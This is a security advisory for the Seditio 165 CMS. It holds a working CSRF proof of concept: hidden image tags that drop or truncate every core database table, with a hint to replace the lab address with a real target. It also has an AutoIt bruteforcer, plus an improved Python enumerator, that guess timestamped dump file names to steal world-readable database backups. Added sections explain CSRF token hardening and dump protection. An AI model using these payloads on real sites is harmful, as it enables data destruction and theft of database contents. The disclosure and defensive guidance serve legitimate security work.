Seditio 165: CSRF and world-readable DB dump issues

2012-04-09T00:00:00
ID SECURITYVULNS:DOC:27914
Type securityvulns
Reporter Securityvulns
Modified 2012-04-09T00:00:00

Description

=============================================
Vulnerable Software: Seditio v165
Downloaded from: http://seditio-eklenti.com/datas/users/1-seditio.165.rar (this version is under development by Kaan)

$ md5sum 1-seditio.165.rar
2eebc8d80f7fcd4e9a0d0659ef193488  1-seditio.165.rar
=============================================
Vuln Desc:
Seditio 165 is prone to a cross-site request forgery (CSRF) vulnerability. Its administration section uses T3 DB Tools v1.6, whose actions are driven purely by $_GET parameters without any anti-CSRF token, so it is possible to CSRF the application without any problem and drop/truncate database tables.
The second issue is that Seditio 165 stores database dump files in an unsafe manner (see below).
==============================================
Tested:
php.ini: MAGIC_QUOTES_GPC OFF, Safe mode off
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
=================================================

Print screen after a successful CSRF attack: http://s019.radikal.ru/i601/1204/1b/90552af729ad.png

====================== Seditio 165 Drop/truncate Database tables using CSRF vuln ===================================
<h1>Seditio 165 Drop Database tables using CSRF vuln<br>
because the administration section uses T3 DB Tools v1.6 without any $_GET tokenization.</h1>

<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_posts" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_sections" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_structure" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_topics" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_logger" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pages" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pfs_folders" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pm" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_options" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_voters" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_redirecter" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_trash" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_referers" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_auth" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_banlist" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_com" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_plugins" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_users" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_online" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_config" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_core" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_groups_users" width="0" height="0">
<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_cache" width="0" height="0">
<!-- IDEA! Ctrl+H: replace http://192.168.0.15/learn/128/sed/seditio165/ with the target :D -->
====================== EOF Seditio 165 Drop Database tables using CSRF vuln ===================================

You can also change &a=drop to &a=truncate, e.g.:
<img src="http://CHANGE_TO_TARGET/admin.php?m=dbtools&a=truncate&table=sed_forum_posts" width="0" height="0">
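The GET-driven admin action above is the whole bug: the browser issues the request from an <img> tag with the admin's session cookie attached, and the server cannot tell it from a click in the admin panel. Below is an added example (not Seditio or T3 DB Tools code, and not the advisory author's) that models such a dispatcher in Python, first in the vulnerable shape the advisory describes, then hardened: destructive actions accepted only over POST, a session-bound anti-CSRF token compared in constant time, and the table name taken from an allowlist rather than straight from the query string. The Request class, the function names, the TABLES stand-in and the session identifiers are assumptions made for this illustration.

```python
"""Added example: a model of admin.php?m=dbtools&a=drop&table=... in its
vulnerable and hardened forms.  Not Seditio/T3 DB Tools code; all names are
assumptions for the illustration."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Constructed stand-in for the database: table name -> row count.
TABLES = {"sed_forum_posts": 120, "sed_users": 7, "sed_config": 45}
ALLOWED_TABLES = frozenset(TABLES)

# Assumption: a per-deployment secret that never leaves the server.
SERVER_SECRET = secrets.token_bytes(32)


@dataclass
class Request:
    method: str        # "GET" or "POST"
    params: dict       # merged query/body parameters, like $_GET/$_POST
    session_id: str    # taken from the admin's session cookie


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the admin session via HMAC: a token captured from one
    session is useless in another, and nothing needs to be stored server-side."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _apply(action: str, table: str, db: dict) -> str:
    if action == "drop":
        del db[table]
    else:                       # truncate
        db[table] = 0
    return f"{action} {table}: ok"


def dispatch_vulnerable(req: Request, db: dict) -> str:
    """The advisory's flaw: any request carrying a=drop&table=X drops X.
    An <img src=...> on an attacker page produces exactly such a GET."""
    if req.params.get("m") != "dbtools":
        return "ignored"
    action, table = req.params.get("a"), req.params.get("table")
    if action in ("drop", "truncate") and table in db:
        return _apply(action, table, db)
    return "nothing done"


def dispatch_hardened(req: Request, db: dict) -> str:
    """Same dispatcher with the checks a reviewer would demand."""
    if req.params.get("m") != "dbtools":
        return "ignored"
    action, table = req.params.get("a"), req.params.get("table")
    if action not in ("drop", "truncate"):
        return "nothing done"
    # 1. State-changing actions are never reachable by GET.  <img> and <a>
    #    can only produce GET, so this alone defeats the PoC above.
    if req.method != "POST":
        return "rejected: state-changing action requires POST"
    # 2. Per-session anti-CSRF token, checked in constant time.
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, issue_csrf_token(req.session_id)):
        return "rejected: bad or missing CSRF token"
    # 3. Table name must come from the allowlist, not be trusted as given.
    if table not in ALLOWED_TABLES or table not in db:
        return "rejected: unknown table"
    return _apply(action, table, db)


if __name__ == "__main__":
    forged = Request("GET", {"m": "dbtools", "a": "drop", "table": "sed_forum_posts"}, "admin-sess")
    print("vulnerable:", dispatch_vulnerable(forged, dict(TABLES)))
    print("hardened:  ", dispatch_hardened(forged, dict(TABLES)))
```

In the real application the equivalent lives in the PHP admin module: the token is rendered into the dbtools form and verified before any DROP/TRUNCATE, and the handler refuses the action on GET. Checking the Origin/Referer header is a useful second layer but not a substitute for the token.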

Another issue: there is no .htaccess file protecting the database dump files from the world (hint: an .htaccess containing "deny from all").

me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
$ ls -lia
total 93
 562949953537506 drwxrwxrwx+ 1 mehere   ???????? 0     Apr  7 03:08 .
1407374883669468 drwxrwxrwx+ 1 mehere   ???????? 0     Apr  7 03:02 ..
 562949953537507 -rwxrwxrwx+ 1 mehere   ???????? 370   Feb 12 21:39 index.php
1970324837100442 -rwx------+ 1 ???????? ???????? 91031 Apr  7 03:08 sed165_04.07.12-030823.sql   <=== this is my dump

me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups
$ pwd
/cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups

Since the database dumps are potentially world readable over HTTP (the backups directory sits under the web root with only an index.php and no access restriction), it is possible to bruteforce the names of existing dump(s) and steal them. Written from scratch and a bit lame, but it works for me; at least it is a proof of concept. Print screen of the bruteforce result: http://s019.radikal.ru/i614/1204/af/a16616428e18.png
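How guessable the dump name is follows from its format in the listing above, <prefix>MM.DD.YY-HHMMSS.sql: one candidate per second, so a day is 86,400 names and a plausible backup window is far less. As an added example (not the advisory author's script and not Seditio code), the Python below builds that candidate list with datetime arithmetic, which goes beyond the AutoIt script further down in that it stays correct across month and year boundaries, and probes a base URL through an injectable fetch function, keying on the same "-- T3 DB Tools" header the advisory's script looks for. The fake site contents, the fetch function and the one-hour search window are constructed for this illustration.

```python
"""Added example: enumerate T3 DB Tools dump names (<prefix>MM.DD.YY-HHMMSS.sql)
and probe them through an injectable fetcher.  Not the advisory's AutoIt
script and not Seditio code; the fake site below is constructed."""
from datetime import datetime, timedelta
from typing import Callable, Iterable, Iterator, Optional

# Header string the advisory keys on to recognise a T3 DB Tools dump.
DUMP_MARKER = "-- T3 DB Tools"


def dump_name(prefix: str, when: datetime) -> str:
    """Render a dump file name exactly as the directory listing shows it."""
    return f"{prefix}{when:%m.%d.%y-%H%M%S}.sql"


def candidate_names(prefix: str, start: datetime, end: datetime) -> Iterator[str]:
    """Every one-second candidate from start to end, inclusive.  datetime
    arithmetic replaces hand-rolled carry logic and is correct across
    month and year boundaries."""
    t = start
    step = timedelta(seconds=1)
    while t <= end:
        yield dump_name(prefix, t)
        t += step


def find_dump(fetch: Callable[[str], Optional[str]], base: str,
              names: Iterable[str]) -> Optional[str]:
    """Return the first URL whose body looks like a T3 DB Tools dump, or None.
    `fetch` returns the response body, or None when the path does not exist."""
    for name in names:
        body = fetch(base + name)
        if body is not None and DUMP_MARKER in body[:200]:
            return base + name
    return None


# Constructed offline stand-in for the target: exactly one dump exists.
FAKE_SITE = "http://192.168.0.15/learn/128/sed/seditio165/datas/backups/"
FAKE_FILES = {
    FAKE_SITE + "sed165_04.07.12-030823.sql":
        "-- T3 DB Tools v1.6 dump (constructed sample)\nCREATE TABLE sed_users (...);\n",
}


def fake_fetch(url: str) -> Optional[str]:
    """Assumption: a real fetcher would do an HTTP GET and map 404 to None."""
    return FAKE_FILES.get(url)


def search_window(hours_back: int = 1) -> Optional[str]:
    """Assume the dump was taken within `hours_back` hours before
    2012-04-07 03:08:23 (the mtime shown in the listing)."""
    end = datetime(2012, 4, 7, 3, 8, 23)
    start = end - timedelta(hours=hours_back)
    return find_dump(fake_fetch, FAKE_SITE, candidate_names("sed165_", start, end))


if __name__ == "__main__":
    print(search_window())
```

Against a live target the fetcher is a plain HTTP GET, and the cost is one request per candidate second, which is noisy but cheap over a short window. The defence is therefore not to rely on the timestamp being unknown: keep dumps outside the document root, or deny web access to datas/backups, and delete dumps once downloaded.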

==================== Bruteforcer to find existing database dump file for seditio 165 ==========================

#include <Inet.au3>

$prefix = 'sed165_'   ; db prefix, in most cases sed_

$il = '2012'          ; start year
$ay = '04'            ; start month
$gun = '07'           ; start day
$site = 'http://192.168.0.15/learn/128/sed/seditio165/datas/backups/'   ; target site

#cs
DO not touch
#ce
$saniye = 0           ; seconds
$deqiqe = 0           ; minutes
$saat = 3             ; hours
;~ $gun='01'

$il = StringMid($il, 3, StringLen($il))   ; two-digit year, as used in the dump name

While 1
    Sleep(10)
    $saniye += 1
    If $saniye > 59 Then
        $saniye = '00'
        $deqiqe += 1
    EndIf

    If $deqiqe < 10 Then
        $deqiqe = '0' & StringMid($deqiqe, StringLen($deqiqe), 1)
    EndIf

    If $deqiqe > 59 Then
        $deqiqe = '00'
        $saat += 1
    EndIf

    If $saat < 10 Then
        $saat = '0' & StringMid($saat, StringLen($saat), 1)
    EndIf

    If $saat > 23 Then
        $saat = '00'
        $gun += 1
    EndIf

    If $gun < 10 Then
        $gun = '0' & StringMid($gun, StringLen($gun), 1)
    EndIf

    If $gun > 31 Then
        $gun = '01'
        $ay += 1
    EndIf

    If $ay < 10 Then
        $ay = '0' & StringMid($ay, StringLen($ay), 1)
    EndIf

    If $ay > 12 Then
        $ay = '01'
        $il += 1
    EndIf

    If $saniye < 10 Then
        $saniye = '0' & StringMid($saniye, 1, 1)
    EndIf

    ;~ format of dump file: sed165_04.07.12-030823.sql
    $fetchitifexists = $prefix & $ay & '.' & $gun & '.' & $il & '-' & $saat & $deqiqe & $saniye & '.sql'
    ConsoleWrite('Verifying ' & $fetchitifexists & @CRLF)

    ; a real dump starts with the T3 DB Tools header; anything else (404 page etc.) is skipped
    If StringInStr(_INetGetSource($site & $fetchitifexists, True), '-- T3 DB Tools', 0) Then
        MsgBox(0, "Check it out", $site & $fetchitifexists, 10)
        FileWrite(@ScriptDir & "\wohoooo.txt", $site & $fetchitifexists & @CRLF)
        $confirm = MsgBox(65, "Exit or continue?", "Exit or Continue?")
        If $confirm = 1 Then
            MsgBox(48, "Bye", "Byeeee xD")
            Exit
        EndIf
    EndIf
WEnd

========================== EOF bruteforcer ============================================================

/AkaStep ^_^